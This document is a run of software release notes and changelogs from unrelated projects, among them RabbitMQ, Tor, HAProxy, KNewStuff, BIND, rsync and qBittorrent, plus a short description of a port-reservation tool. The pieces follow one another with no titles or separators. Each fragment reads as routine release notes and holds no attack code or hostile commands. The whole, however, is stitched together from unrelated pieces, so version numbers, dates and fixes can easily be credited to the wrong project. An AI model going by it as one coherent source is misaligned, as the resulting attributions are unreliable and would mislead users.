Sometimes you need a networked program to bind to a port that can't
be hard-coded. Generally this is when you want to run several of
them in parallel; if they all bind to port 8080, only one of them
can succeed.
The usual solution is the "port 0 trick". If you bind to port 0,
your kernel will find some arbitrary high-numbered port that's
unused and bind to that. Afterward you can query the actual port
that was bound to if you need to use the port number elsewhere.
However, there are cases where the port 0 trick won't work. For
example, mysqld takes port 0 to mean "the port configured in my.cnf".
Docker can bind your containers to port 0, but uses its own
implementation to find a free port which races and fails in the
face of parallelism.
ephemeral-port-reserve provides an implementation of the port 0
trick which is reliable and race-free.
RabbitMQ 3.9.16
Core Server
Enhancements
Quorum queues: better forward compatibility with (currently in preview) RabbitMQ 3.10.
Significantly faster exchange re-import from definitions
on subsequent node restarts. Initial definition import still takes
the same amount of time as before.
RabbitMQ nodes will now filter out certain log messages related to
connections, channels, and queue leader replicas receiving internal protocol messages
sent to this node before a restart. These messages usually raise more questions
and cause confusion than help.
It is still possible to detect relevant underlying events (node or connection failures)
from other log messages.
Bug Fixes
rabbitmq-upgrade await_online_synchronized_mirror is now a no-op in single node
clusters
Prometheus Plugin
Bug Fixes
One metric that was exposed via CLI tools and management plugin's HTTP API
was not exposed via Prometheus scraping API.
Changes in version 0.4.7.7 - 2022-04-27
This is the first stable version of the 0.4.7.x series. This series includes
several major bugfixes from previous series and one massive new feature:
congestion control.
Congestion control should improve traffic speed and stability on the network
once a majority of Exit upgrade. You can find more details about it in
proposal 324 in the torspec.git repository.
For a complete list of changes since 0.4.6.10, see the ReleaseNotes file.
o Minor features (fallbackdir):
- Regenerate fallback directories generated on April 27, 2022.
o Minor features (geoip data):
- Update the geoip files to match the IPFire Location Database, as
retrieved on 2022/04/27.
o Minor bugfixes (congestion control, client side logs):
- Demote a warn about 1-hop circuits using congestion control down to
info; Demote the 4-hop case to notice. Fixes bug 40598; bugfix on
0.4.5-alpha.
Changes in version 0.4.7.6-rc - 2022-04-07
This is the first release candidate of the 0.4.7.x series. Only one minor
bugfix went in since the last alpha couple weeks ago. We strongly recommend
anyone running an alpha version to upgrade to this version. Unless major
problems are found, the next release will finally be the stable!
o Minor features (fallbackdir):
- Regenerate fallback directories generated on April 07, 2022.
o Minor features (geoip data):
- Update the geoip files to match the IPFire Location Database, as
retrieved on 2022/04/07.
o Minor features (linux seccomp2 sandbox):
- Permit the clone3 syscall, which is apparently used in glibc-2.34
and later. Closes ticket 40590.
Changes in version 0.4.7.5-alpha - 2022-03-25
This version contains, of what we hope, the final work for congestion
control paving the way to the stable version. We expect this to be the last
alpha version of the 0.4.7.x series. Mostly minor bugfixes except one major
bugfix that changes how Tor behaves with DNS timeouts for Exit relays. As
always with an alpha, we recommend all relay operators to upgrade from
previous alpha to this one.
o Major bugfixes (onion service, congestion control):
- Fix the onion service upload case where the congestion control
parameters were not added to the right object. Fixes bug 40586;
bugfix on 0.4.7.4-alpha.
o Major bugfixes (relay, DNS):
- Lower the DNS timeout from 3 attempts at 5 seconds each to 2
attempts at 1 seconds each. Two new consensus parameters were
added to control these values. This change should improve observed
performance under DNS load; see ticket for more details. Fixes bug
40312; bugfix on 0.3.5.1-alpha.
o Minor features (control port):
- Provide congestion control fields on CIRC_BW and STREAM control
port events, for use by sbws. Closes ticket 40568.
o Minor features (fallbackdir):
- Regenerate fallback directories generated on March 25, 2022.
o Minor features (geoip data):
- Update the geoip files to match the IPFire Location Database, as
retrieved on 2022/03/25.
o Minor bugfixes (DNSPort, dormant mode):
- A request on the DNSPort now wakes up a dormant tor. Fixes bug
40577; bugfix on 0.3.5.1-alpha.
o Minor bugfixes (metrics port, onion service):
- Fix the metrics with a port label to be unique. Before this, all
ports of an onion service would be on the same line which violates
the Prometheus rules of unique labels. Fixes bug 40581; bugfix
on 0.4.5.1-alpha.
o Minor bugfixes (onion service congestion control):
- Avoid a non-fatal assertion failure in the case where we fail to
set up congestion control on a rendezvous circuit. This could
happen naturally if a cache entry expired at an unexpected time.
Fixes bug 40576; bugfix on 0.4.7.4-alpha.
o Minor bugfixes (onion service, client):
- Fix a rare but fatal assertion failure due to a guard subsystem
recursion triggered by the onion service client. Fixes bug 40579;
bugfix on 0.3.5.1-alpha.
o Minor bugfixes (relay, overload):
- Decide whether to signal overload based on a fraction and
assessment period of ntor handshake drops. Previously, a single
drop could trigger an overload state, which caused many false
positives. Fixes bug 40560; bugfix on 0.4.7.1-alpha.
Changes in version 0.4.7.4-alpha - 2022-02-25
This version contains the negotiation congestion control work which is the
final part needed before going stable. There are also various bugfixes
including two major ones detailed below. Last, the Exit notice page layout
has been modernized but the text is unchanged. We recommend that all relay
operators running any previous alpha upgrade to this one.
o Major features (relay, client, onion services):
- Implement RTT-based congestion control for exits and onion
services, from Proposal 324. Disabled by default. Enabled by the
'cc_alg' consensus parameter. Closes ticket 40444.
o Major bugfixes (client):
- Stop caching TCP connect failures to relays/bridges when we
initiated the connection as a client. Now we only cache connect
failures as a relay or bridge when we initiated them because of an
EXTEND request. Declining to re-attempt the client-based
connections could cause problems when we lose connectivity and try
to reconnect. Fixes bug 40499; bugfix on 0.3.3.4-alpha.
o Major bugfixes (relay, overload):
- Do not trigger a general overload on DNS timeout. Even after
fixing 40527, some code remained that triggered the overload.
Fixes bug 40564; bugfix on 0.4.7.1-alpha.
o Minor feature (authority, relay):
- Reject End-Of-Life relays running version 0.3.5.x. Closes
ticket 40559.
o Minor features (fallbackdir):
- Regenerate fallback directories generated on February 25, 2022.
o Minor features (geoip data):
- Update the geoip files to match the IPFire Location Database, as
retrieved on 2022/02/25.
o Minor bugfix (logging):
- Update a log notice dead URL to a working one. Fixes bug 40544;
bugfix on 0.3.5.1-alpha.
o Minor bugfix (relay):
- Remove the HSDir and HSIntro onion service v2 protocol versions so
relay stop advertising that they support them. Fixes bug 40509;
bugfix on 0.3.5.17.
o Minor bugfixes (cell scheduling):
- Avoid writing empty payload with NSS write.
- Don't attempt to write 0 bytes after a cell scheduling loop. No
empty payload was put on the wire. Fixes bug 40548; bugfix
on 0.3.5.1-alpha.
o Minor bugfixes (compilation):
- Resume being able to build on old / esoteric gcc versions. Fixes
bug 40550; bugfix on 0.4.7.1-alpha.
o Minor bugfixes (compiler warnings):
- Fix couple compiler warnings on latest Ubuntu Jammy. Fixes bug
40516; bugfix on 0.3.5.1-alpha.
o Documentation:
- Provide an improved version of the tor-exit-notice.html file for
exit relays to use as a landing page. The text is unchanged, but
the page design and layout are significantly modernized, and
several links are fixed. Patch from "n_user"; closes ticket 40529.
## [4.7.0] - 2022-04-26
### Added
- Allow disabling the internal DHCP server
- icmp: Support falling back on trying a SOCK_RAW socket
- Support Unix sockets in hostfwd
- IPv6 DNS proxying support
- bootp: add support for UEFI HTTP boot
- New callback that supports CFI better
### Fixed
- dhcp: Always send DHCP_OPT_LEN bytes in options
- Fix Haiku build
- Fix memory leak when using libresolv
- Ensure sin6_scope_id is zero for global addresses
- resolv: fix IPv6 resolution on Darwin
- socket: Initialize so_type in socreate
- Handle ECONNABORTED from recv
2.5.6
- BUG/MINOR: tools: fix url2sa return value with IPv4
- BUG/MINOR: httpclient/lua: stuck when closing without data
- MINOR: server: export server_parse_sni_expr() function
- BUG/MINOR: httpclient: send the SNI using the host header
- BUILD: httpclient: fix build without SSL
- BUG/MINOR: server/ssl: free the SNI sample expression
- BUG/MINOR: httpclient: only check co_data() instead of HTTP_MSG_DATA
- BUG/MINOR: httpclient: process the response when received before the end of the request
- BUG/MINOR: httpclient: CF_SHUTW_NOW should be tested with channel_is_empty()
- CI: github actions: switch to LibreSSL-3.5.1
- BUG/MEDIUM: mux-h1: only turn CO_FL_ERROR to CS_FL_ERROR with empty ibuf
- BUG/MEDIUM: stream-int: do not rely on the connection error once established
- BUG/MEDIUM: trace: avoid race condition when retrieving session from conn->owner
- MEDIUM: mux-h2: slightly relax timeout management rules
- BUG/MEDIUM: mux-h2: make use of http-request and keep-alive timeouts
- BUG/MINOR: rules: Initialize the list element when allocating a new rule
- MEDIUM: mqtt: support mqtt_is_valid and mqtt_field_value converters for MQTTv3.1
- DOC: config: Explictly add supported MQTT versions
- BUG/MINOR: tools: url2sa reads too far when no port nor path
- DOC: reflect H2 timeout changes
- BUG/MEDIUM: mux-fcgi: Properly handle return value of headers/trailers parsing
- BUG/MEDIUM: mux-h1: Properly detect full buffer cases during message parsing
- REGTESTS: ssl: use X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY for cert check
- BUG/MINOR: samples: add missing context names for sample fetch functions
- BUG/MINOR: cli/stream: fix "shutdown session" to iterate over all threads
- BUG/MAJOR: mux_pt: always report the connection error to the conn_stream
- DOC: remove double blanks in configuration.txt
- CI: github actions: update OpenSSL to 3.0.2
- BUG/MINOR: ssl/cli: Remove empty lines from CLI output
- BUG/MINOR: httpclient: end callback in applet release
- BUG/MINOR: fcgi-app: Don't add C-L header on response to HEAD requests
- BUG/MEDIUM: stats: Be sure to never set EOM flag on an empty HTX message
- BUG/MEDIUM: hlua: Don't set EOM flag on an empty HTX message in HTTP applet
- BUG/MEDIUM: promex: Be sure to never set EOM flag on an empty HTX message
- BUG/MEDIUM: mux-h1: Set outgoing message to DONE when payload length is reached
- BUG/MEDIUM: http-conv: Fix url_enc() to not crush const samples
- BUG/MEDIUM: http-act: Don't replace URI if path is not found or invalid
- BUG/MINOR: opentracing: setting the return value in function flt_ot_var_set()
- BUG/BUILD: opentracing: fixed OT_DEFINE variable setting
- EXAMPLES: opentracing: refined shell scripts for testing filter performance
- DOC: opentracing: corrected comments in function descriptions
- CLEANUP: opentracing: removed unused function flt_ot_var_unset()
- CLEANUP: opentracing: removed unused function flt_ot_var_get()
- Revert "MINOR: opentracing: change the scope of the variable 'ot.uuid' from 'sess' to 'txn'"
- MINOR: opentracing: only takes the variables lock on shared entries
- CLEANUP: opentracing: added flt_ot_smp_init() function
- CLEANUP: opentracing: added variable to store variable length
- MINOR: opentracing: improved normalization of context variable names
- DEBUG: opentracing: show return values of all functions in the debug output
- CLEANUP: opentracing: added FLT_OT_PARSE_INVALID_enum enum
- DEBUG: opentracing: display the contents of the err variable after setting
- MAJOR: opentracing: reenable usage of vars to transmit opentracing context
- Revert "BUILD: opentracing: display warning in case of using OT_USE_VARS at compile time"
- MEDIUM: global: Add a "close-spread-time" option to spread soft-stop on time window
- CI: Update to actions/checkout@v3
- CI: Update to actions/cache@v3
- BUG/MINOR: stats: define the description' background color in dark color scheme
- CI: github actions: disable -Wno-deprecated
- CI: cirrus: switch to FreeBSD-13.0
- BUG/MINOR: mux-h2: do not send GOAWAY if SETTINGS were not sent
- BUG/MINOR: cache: do not display expired entries in "show cache"
- BUILD: debug: mark the __start_mem_stats/__stop_mem_stats symbols as weak
- BUG/MINOR: mux-h2: do not use timeout http-keep-alive on backend side
- BUG/MINOR: mux-h2: use timeout http-request as a fallback for http-keep-alive
- BUG/MEDIUM: mux-h1: Don't request more room on partial trailers
- BUILD: sched: workaround crazy and dangerous warning in Clang 14
- BUILD: compiler: use a more portable set of asm(".weak") statements
- BUG/MEDIUM: stream: do not abort connection setup too early
- BUG/MEDIUM: fcgi-app: Use http_msg flags to know if C-L header can be added
- BUG/MEDIUM: compression: Don't forget to update htx_sl and http_msg flags
- SCRIPTS: announce-release: update the doc's URL
- DOC: lua: update a few doc URLs
- SCRIPTS: announce-release: add shortened links to pending issues
- BUILD: calltrace: fix wrong include when building with TRACE=1
- BUG/MINOR: cache: Disable cache if applet creation fails
- BUG/MAJOR: connection: Never remove connection from idle lists outside the lock
- MINOR: task: add a new task_instant_wakeup() function
- MEDIUM: queue: use tasklet_instant_wakeup() to wake tasks
- DOC: remove my name from the config doc
- BUG/MINOR: rules: Forbid captures in defaults section if used by a backend
- BUG/MEDIUM: rules: Be able to use captures defined in defaults section
- BUG/MINOR: rules: Fix check_capture() function to use the right rule arguments
- Revert "CI: github actions: disable -Wno-deprecated"
- BUG/MINOR: sample: add missing use_backend/use-server contexts in smp_resolve_args
- BUG/MINOR: connection: "connection:close" header added despite 'close-spread-time'
- REGTESTS: fix the race conditions in be2dec.vtc ad field.vtc
3.2.1 (2022-04-11)
* Bugfixes
* Fix incorrect namespace used for caching function returns
* Remove redundant encode
* Remove redundant lowercase
* Remove unused `try`/`except` path
* Add types to the private API (disallow untyped calls and defs)
* Rely on `python_requires` instead of runtime check
* Docs
* Fix docs with updated types
* Fix link in Travis CI badge
* Rewrite documentation intro
* Remove unnecessary subheading
* Unify case
3.2.0 (2022-02-20)
* Features
* Add types to the public API
* Bugfixes
* Add support for Python 3.10
* Drop support for EOL Python 3.6
* Remove py2 tag from wheel
* Remove extra backtick in README
0.14.1
[BUGFIX] Revert choose_encoder being renamed to choose_formatter to fix a breaking change. For the 0.14.x release cycle choose_formatter will still exist, but will be removed in 0.15.0.
5.81.0
qtquickengine: Do not forward intermediate states
quickengine: Emit entryEvent signal with enum which is exposed to QML
Create a NewStuff.Action component, add NewStuff.Settings global
Less risk of infinite spinner on uninstalling KPackage based things
5.82.0
Deprecate quickengine changedEntries & related methods
Do not show error when installation is canceled
NewStuff Dialog: Forward entryEvent signal
NewStuff Button: Forward entryEvent signal
Make QML GHNS dialog a tiny bit wider
ensure .desktop files are executable
5.83.0
Ensure XmlLoader works in the expected, asynchronous fashion
Add functionality to have a local providers file
Don't show Go to... action unless it has children
Fix opensearch parsing
Make Syndication optional and only build OPDS plugin when present
Change the role names in the search preset to custom ones
Add in tagfilters and filter out entries that are not openaccess for now
Add recommended and subscription to the searchpreset types
Ensure to use the 'self' link relation for resolving relative urls
Add download size if said information is available
Add concept of search presets to hold navigation links for opds feed
Make sure the documents are valid feed documents
Fix some misunderstandings with Download Link information
Engine: Deprecate configSearchLocations and setConfigLocationFallback methods
Make knewstuff-dialog work more reliable
KNSCore::Engine: Add method to list all available knsrc files
KNSCore::Question: Use nested event loop for waiting
5.84.0
Download missing BSD-2-Clause, CC0-1.0 and LGPL-3.0-or-later licenses
Forward the error code signal from Engine through to QML
Sort and capitalise items in the knewstuff-dialog tool's sidebar
Align messagebox icon to the top (closer to how widget ones look)
Add an icon to the messageboxsheet
Quick little @since for the new enum value
Registering the error codes from KNSCore to allow them to be used easily in
QtQuick
Handle a 503 for OPDS opensearch urls, and schedule a reload
Forward the httpjob's error through xmlloader
Handle the provider file failing on a 503, and schedule reloading
Add in a status signal forward for 503 errors for httpjob
Handle "temporarily down" situations (http 503) more gracefully
5.85.0
Rework UploadDialog, add QML version, and a new ProvidersModel
Simplify lookup of knsrc files using KFileUtils::findAllUniqueFiles method
Forward Attica provider icons to KNSCore::Provider
Handle payload-only entries during update operations
5.86.0
Port from KMountPoint to QStorageInfo
Set KLocalizedContext for QtQuickDialogWrapper
Use QToolButton for reset button as we have the same style
5.87.0
staticxml: Do not report installed packages for page != 0
Engine: Do not require waiting for the providers to tell our installed entries
Fix crash in DownloadWidget
Add licenses CC0 license info to non-copyrightable files
Add BSD-2-Clause license info to cmake files
Add CC0-1.0 license identifier to non-copyrightable files
Include a user agent on KNS requests
attica: use compile-time connects
Add support for static builds - fixes
Add missing find_package(Qt5Gui)
Add support for static builds
FileCopyJob: implement error handling
Page: Remind/notify users that everything here is 3rd-party content
5.88.0
Port to enum values for KAuthorized::authorizeAction
5.89.0
Improve presentation of multi-file download sheet
Use RTL half-star rating icon when in RTL mode
5.90.0
Drop lib prefix when building for Windows
Remove defunct manual khotnewstuff_upload test
Revert "Adapt build system for building against qt6" (commited in bad
Revert "Add volker fix about cmake variable" (commited in bad branch)
Fix i18n* functions for knewstuff-dialog not existing
Move KNS3::Action class to new KNSWidgets submodule
New class: KNS3::Action
5.91.0
Update code snippet for NewStuff.Action
Register KNSCore::Entry under name "Entry" as a Q_GADGET to QML
Consume string views before they become invalid
Focus search field by default unless doing so would show the virtual keyboard
Deprecate KNS3::Button class in favor of KNSWidgets::Button
Introduce KNSWidgets::Button class for better compatibility with KF6 changes
KNSWidgets::Action add compatibility for unified entry class in KF6
Unify how kpackageType is determined for the addons
Button.qml Fix binding for engine property
Button.qml: Use QML loaders for dialog component
Fix broken usage example for NewStuff.Action
5.92.0
kmoretools: Fix OBS appstream id
Add conditional cache preference to http requests
Engine: Ensure we are not using the wrong ProvidersUrl
Add http2 to KNewStuff requests
KNSCore::Engine: Expose our Attica::Provider
5.93.0
Fix problems renaming a temporary file on Windows
Installation: don't let QTemporaryFile delete the file before using it
Do not set user-visible name as additional agent information when copying
provider
Do not set user-visible name as additional agent information
Engine: Default to autoconfig.kde.org for reading ProvidersUrl
Port to ECMQmlModule
Fix close button for NewStuff.Dialog not existing on X11
Fix certain tars not being recognized as valid archives
Version 0.73 (2021/02/19)
improve error reporting
fixed another configuration parsing bug
Version 0.72 (2021/02/16)
fixed a configuration parsing bug making 0.71 almost unusable
Version 0.71 (2021/02/14)
IPv6 support
fixed a display overflow in data usage statistics
made the configuration parser more tolerant with service names that contain
dashes (e.g. snmp-trap) or hostnames with underscores
create the log file if it does not exist
new Visual Studio project file
Version 0.70 (2017/09/09)
UDP support
source address binding support
use a real grammar for the configuration file and get rid of the hand-made
parser
Version 0.63 (2017/07/19)
added a -f flag to run in the foreground
quit cleanly when SIGINT is received
increased data buffer size for better performance
fixed random uninitialised data accesses
fixed a memory leak in connection reallocation
fixed a file descriptor leak in configuration reload
fixed configuration file parsing (many bugs including a buffer overflow)
fixed configuration error reporting (line numbers were wrong)
log accepted connections in addition to denied ones
log DNS errors
code quality refactoring: got rid of a lot of old code, used C library
functions instead of custom ones, enforced const correctness
--- 9.16.28 released ---
5856. [bug] The "starting maxtime timer" message related to outgoing
zone transfers was incorrectly logged at the ERROR level
instead of DEBUG(1). [GL #3208]
5852. [func] Add new "reuseport" option to enable/disable load
balancing of sockets. [GL #3249]
5843. [bug] When an UPDATE targets a zone that is not configured,
the requested zone name is now logged in the "not
authoritative" error message, so that it is easier to
track down problematic update clients. [GL #3209]
5836. [bug] Quote the dns64 prefix in error messages that complain
about problems with it, to avoid confusion with the
following dns64 ACLs. [GL #3210]
5834. [cleanup] C99 variable-length arrays are difficult to use safely,
so avoid them except in test code. [GL #3201]
5828. [bug] Replace single TCP write timer with per-TCP write
timers. [GL #3200]
5824. [bug] Invalid dnssec-policy definitions were being accepted
where the defined keys did not cover both KSK and ZSK
roles for a given algorithm. This is now checked for
and the dnssec-policy is rejected if both roles are
not present for all algorithms in use. [GL #3142]
# NEWS for rsync 3.2.4 (15 Apr 2022)
## Changes in this version:
### BEHAVIOR CHANGES:
- A new form of arg protection was added that works similarly to the older
[`--protect-args`](rsync.1#opt) (`-s`) option but in a way that avoids
breaking things like rrsync (the restricted rsync script): rsync now uses
backslash escaping for sending "shell-active" characters to the remote
shell. This includes spaces, so fetching a remote file via a simple quoted
filename value now works by default without any extra quoting:
```shell
rsync -aiv host:'a simple file.pdf' .
```
Wildcards are not escaped in filename args, but they are escaped in options
like the [`--suffix`](rsync.1#opt) and [`--usermap`](rsync.1#opt) values.
If your rsync script depends on the old arg-splitting behavior, either run
it with the [`--old-args`](rsync.1#opt) option or `export RSYNC_OLD_ARGS=1`
in the script's environment. See also the [ADVANCED USAGE](rsync.1#)
section of rsync's manpage for how to use a more modern arg style.
- A long-standing bug was preventing rsync from figuring out the current
locale's decimal point character, which made rsync always output numbers
using the "C" locale. Since this is now fixed in 3.2.4, a script that
parses rsync's decimal numbers (e.g. from the verbose footer) may want to
setup the environment in a way that the output continues to be in the C
locale. For instance, one of the following should work fine:
```shell
export LC_ALL=C.UTF-8
```
or if iconv translations are needed:
```shell
if [ "${LC_ALL:-}" ]; then
export LANG="$LC_ALL"
export LC_CTYPE="$LC_ALL"
unset LC_ALL
fi
export LC_NUMERIC=C.UTF-8
```
### SECURITY FIXES:
- A fix for CVE-2018-25032 in the bundled zlib (memory corruption issue).
### BUG FIXES:
- Fixed a bug with [`--inplace`](rsync.1#opt) + [`--sparse`](rsync.1#opt) (and
a lack of [`--whole-file`](rsync.1#opt)) where the destination file could
get reconstructed with bogus data. Since the bug can also be avoided by
using (the seemingly redundant) [`--no-W`](rsync.1#opt) on the receiving
side, the latest rsync will now send `--no-W` to a remote receiver when this
option combination occurs. If your client rsync is not new enough to do
this for you (or if you're just paranoid), you can manually specify `--no-W
-M--no-W` (when not using [`--whole-file`](rsync.1#opt)) to make sure the
bug is avoided.
- Fixed a bug with [`--mkpath`](rsync.1#opt) if a single-file copy specifies
an existing destination dir with a non-existing destination filename.
- Fixed `--update -vv` to output "is uptodate" instead of "is newer" messages
for files that are being skipped due to an identical modify time. (This was
a new output quirk in 3.2.3.)
- When doing an append transfer, the sending side's file must not get shorter
or it is skipped. Fixes a crash that could occur when the size changes to 0
in the middle of the send negotiations.
- When dealing with special files (see [`--specials`](rsync.1#opt)) in an
alt-dest hierarchy, rsync now checks the non-permission mode bits to ensure
that the 2 special files are really the same before hard-linking them
together.
- Fixed a bug where [`--delay-updates`](rsync.1#opt) with stale partial data
could cause a file to fail to update.
- Fixed a few places that would output an INFO message with
[`--info=NAME`](rsync.1#opt) that should only have been output given
[`--verbose`](rsync.1#opt) or [`--itemize-changes`](rsync.1#opt).
- Avoid a weird failure if you run a local copy with a (useless)
[`--rsh`](rsync.1#opt) option that contains a `V` in the command.
- Fixed a long-standing compression bug where the compression level of the
first file transferred affected the level for all future files. Also, the
per-file compression skipping has apparently never worked, so it is now
documented as being ineffective.
- Fixed a truncate error when a `--write-devices` copy wrote a file onto a
device that was shorter than the device.
- Made `--write-devices` support both `--checksum` and `--no-whole-file` when
copying to a device.
- Improved how the [`--stop-at`](rsync.1#opt), [`--stop-after`](rsync.1#opt),
and (the deprecated) [`--time-limit`](rsync.1#opt) options check to see if
the allowed time is over, which should make rsync exit more consistently.
- Tweak --progress to display "`??:??:??`" when the time-remaining value is so
large as to be meaningless.
- Silence some chmod warnings about symlinks when it looks like we have a
function to set their permissions but they can't really be set.
- Fixed a potential issue in git-set-file-times when handling commits with
high-bit characters in the description & when handling a description that
might mimick the git raw-commit deliniators. (See the support dir.)
- The bundled systemd/rsync.service file now includes `Restart=on-failure`.
### ENHANCEMENTS:
- Use openssl's `-verify_hostname` option in the rsync-ssl script.
- Added extra info to the "FILENAME exists" output of
[`--ignore-existing`](rsync.1#opt) when [`--info=skip2`](rsync.1#opt) is
used. The skip message becomes "FILENAME exists (INFO)" where the INFO is
one of "type change", "sum change" (requires [`--checksum`](rsync.1#opt)),
"file change" (based on the quick check), "attr change", or "uptodate".
Prior versions only supported `--info=skip1`.
- Added the [`--fsync`](rsync.1#opt) option (promoted from the patches repo).
- Added the [`--copy-devices`](rsync.1#opt) option. Compared to the
historical version from the rsync-patches repo, this version: properly
handles `--checksum`; fixes a truncation bug when doing an `--inplace` copy
onto a longer file; fixes several bugs in the `--itemize` output; and only
the sending side needs the enhanced rsync for the copy to work.
- Reduced memory usage for an incremental transfer that has a bunch of small
directories.
- The rsync daemon can now handle a client address with an implied "%scope"
suffix.
- Added support for [`--atimes`](rsync.1#opt) on macOS and fixed a bug where
it wouldn't work without [`--times`](rsync.1#opt).
- Rsync can now update the xattrs on a read-only file when your user can
temporarily add user-write permission to the file. (It always worked for a
root transfer.)
- Rsync can now work around an [`--inplace`](rsync.1#opt) update of a file
that is being refused due to the Linux fs.protected_regular sysctl setting.
- When [`--chown`](rsync.1#opt), [`--usermap`](rsync.1#opt), or
[`--groupmap`](rsync.1#opt) is specified, rsync now makes sure that the
appropriate [`--owner`](rsync.1#opt) and/or [`--group`](rsync.1#opt) options
are enabled.
- Added the [`--info=NONREG`](rsync.1#opt) setting to control if rsync should
warn about non-regular files in the transfer. This is enabled by default
(keeping the behavior the same as before), so specifying `--info=nonreg0`
can be used to turn the warnings off.
- An optional asm optimization for the rolling checksum from Shark64. Enable
it with `./configure --enable-roll-asm`.
- Using `--debug=FILTER` now outputs a caution message if a filter rule
has trailing whitespace.
- Transformed rrsync into a python script with improvements:
- Security has been beefed up.
- The known rsync options were updated to include recent additions.
- Make rrsync reject [`--copy-links`](rsync.1#opt) (`-L`),
[`--copy-dirlinks`](rsync.1#opt) (`-k`), &
[`--keep-dirlinks`](rsync.1#opt) (`-K`) by default to make it harder to
exploit any out-of-subdir symlinks.
- A new rrsync option of [`-munge`](rrsync.1#opt) tells rrsync to always
enable rsync's [`--munge-links`](rsync.1#opt) option on the server side.
- A new rrsync option of [`-no-lock`](rrsync.1#opt) disables a new
single-use locking idiom that is the default when [`-ro`](rrsync.1#opt) is
not used (useful with [`-munge`](rrsync.1#opt)).
- A new rrsync option of [`-no-del`](rrsync.1#opt) disables all `--remove*`
and `--delete*` rsync options on the server side.
- The log format has been tweaked slightly to add seconds to the timestamp
and to output the command executed as a tuple (making the args clearer).
- An rrsync.1 manpage was added (in the support dir with rrsync).
- Added options to the lsh script to facilitate rrsync testing. (See the
support dir.)
- Transformed the atomic-rsync script into a python script and added the
ability to ignore one or more non-zero exit codes. By default, it now
ignores code 24, the file-vanished exit code. (See the support dir.)
- Transformed the munge-symlinks script into python. (See the support dir.)
- Improved the rsync-no-vanished script to not join stdout & stderr together.
(See the support dir.)
- Work around a glibc bug where lchmod() breaks in a chroot w/o /proc mounted.
- Try to support a client that sent a remote rsync a wacko stderr file handle
(such as an older File::RsyncP perl library used by BackupPC).
- Lots of manpage improvements, including better HTML versions.
### PACKAGING RELATED:
- Give configure the `--with-rrsync` option if you want `make install` to
install the (now python3) rrsync script and its new manpage.
- If the rrsync script is installed, its package should be changed to depend
on python3 and the (suggested but not mandatory) python3 braceexpand lib.
- When creating a package from a non-release version (w/o a git checkout), the
packager can elect to create git-version.h and define RSYNC_GITVER to the
string they want `--version` to output. (The file is still auto-generated
using the output of `git describe` when building inside a non-shallow git
checkout, though.)
- Renamed configure's `--enable-simd` option to `--enable-roll-simd` and added
the option `--enable-roll-asm` to use the new asm version of the code. Both
are x86_64/amd64 only.
- Renamed configure's `--enable-asm` option to `--enable-md5-asm` to avoid
confusion with the asm option for the rolling checksum. It is also honored
even when openssl crypto is in use. This allows: normal MD4 & MD5, normal
MD4 + asm MD5, openssl MD4 & MD5, or openssl MD4 + asm MD5 depending on the
configure options selected.
- Made SIMD & asm configure checks default to "no" on non-Linux hosts due to
various reports of problems on NetBSD & macOS hosts. These were also
tweaked to allow enabling the feature on a host_cpu of amd64 (was only
allowed on x86_64 before).
- Fixed configure to not fail at the SIMD check when cross-compiling.
- Improved the IPv6 determination in configure.
- Compile the C files with `-pedantic-errors` (when possible) so that we will
get warned if a static initialization overflows in the future (among other
things).
- When linking with an external zlib, rsync renames its `read_buf()` function
to `read_buf_()` to avoid a symbol clash on an unpatched zlib.
- Added a SECURITY.md file.
v4.4.2
- FEATURE: Allow to limit max memory working set size (glassez)
- BUGFIX: Fix UI crash when torrent is in a non-existent category (Kevin Cox)
- BUGFIX: Correctly handle changing of global save paths (glassez)
- BUGFIX: Disable performance alert (Chocobo1)
- BUGFIX: Prevent loading resume data with inconsistent ID (glassez)
- BUGFIX: Properly handle metadata download for an existing torrent (glassez)
- BUGFIX: Prevent crash when open torrent destination folder (glassez)
- WINDOWS: NSIS: Update Spanish, Spanish International and French translations(Juanjo Jiménez, RqndomHax)
v4.4.1
- FEATURE: Restore all torrent settings to the torrent's main context menu (thalieht)
- FEATURE: Add confirmation for enabling Auto TMM from context menu (thalieht)
- FEATURE: Add tooltip to Automatic Torrent Management context menu action (thalieht)
- FEATURE: Add Select All/None buttons in new torrent dialog (thalieht)
- BUGFIX: Keep "torrent info" alive while generate .torrent file (glassez)
- BUGFIX: Correctly handle Auto TMM in Torrent Files Watcher (glassez)
- BUGFIX: Correctly track the root folder name change (glassez)
- BUGFIX: Various fixes to the moving torrent code (glassez)
- BUGFIX: Update the torrent's download path field when changing category (thalieht)
- BUGFIX: Correctly handle received metadata (glassez)
- BUGFIX: Store hybrid torrents using legacy filenames (glassez)
- BUGFIX: Open correct directory when clicked on Browse button (glassez)
- BUGFIX: Fix crash when shutting down and clicing on system tray icon (Chocobo1)
- BUGFIX: Fix "Free space on disk" in new torrent dialog (thalieht)
- BUGFIX: Optimize completed files handling (Prince Gupta)
- BUGFIX: Migrate proxy settings (sledgehammer999)
- BUGFIX: Try to recover missing categories (glassez)
- WEBUI: WebAPI: fix wrong key used for categories (Chocobo1)
- WEBUI: Remove hack for outdated IE 6 browser (Chocobo1)
- RSS: Correctly handle XML parsing errors (glassez)
v4.4.0
- FEATURE: Support for v2 torrents along with libtorrent 2.0.x support (glassez, Chocobo1)
- FEATURE: Support for Qt6 (glassez)
- FEATURE: Expose libtorrent hashing_threads settings (Anton Bershanskiy)
- FEATURE: Add "Notification timeout" option (kevtechxx)
- FEATURE: Add `connection_speed` to advanced settings (Chocobo1)
- FEATURE: Announce to all trackers if IP changed (zhuangzi926)
- FEATURE: Add tooltip for various columns (Chocobo1)
- FEATURE: Add context menu to toggle content tab columns (AbeniMatteo)
- FEATURE: Add filter "Checking" to side panel (AbeniMatteo)
- FEATURE: Add "Forced metadata downloading" state (AbeniMatteo)
- FEATURE: Remember last viewed page in Options dialog (Chocobo1)
- FEATURE: Add tooltip to listening port spinbox (Chocobo1)
- FEATURE: Add "Skip hash check" option for watched folders (glassez)
- FEATURE: Add "Show torrent options" double-click action (glassez)
- FEATURE: Allow setting temp folder per torrent/catergory (glassez)
- FEATURE: Support folder based UI Themes (Prince Gupta)
- BUGFIX: Save "resume data" once file priority is changed (glassez)
- BUGFIX: Show priority menu at top level if there is no other in Add New Torrent dialog (FozzeY)
- BUGFIX: Capitalize "peer flags" descriptions (Chocobo1)
- BUGFIX: Reorder peer flags (Chocobo1)
- BUGFIX: Show "last activity" value under all circumstances (Chocobo1)
- BUGFIX: Elide text from the right for all columns' header (smigii)
- BUGFIX: Fix startup with different profiles (jagannatharjun)
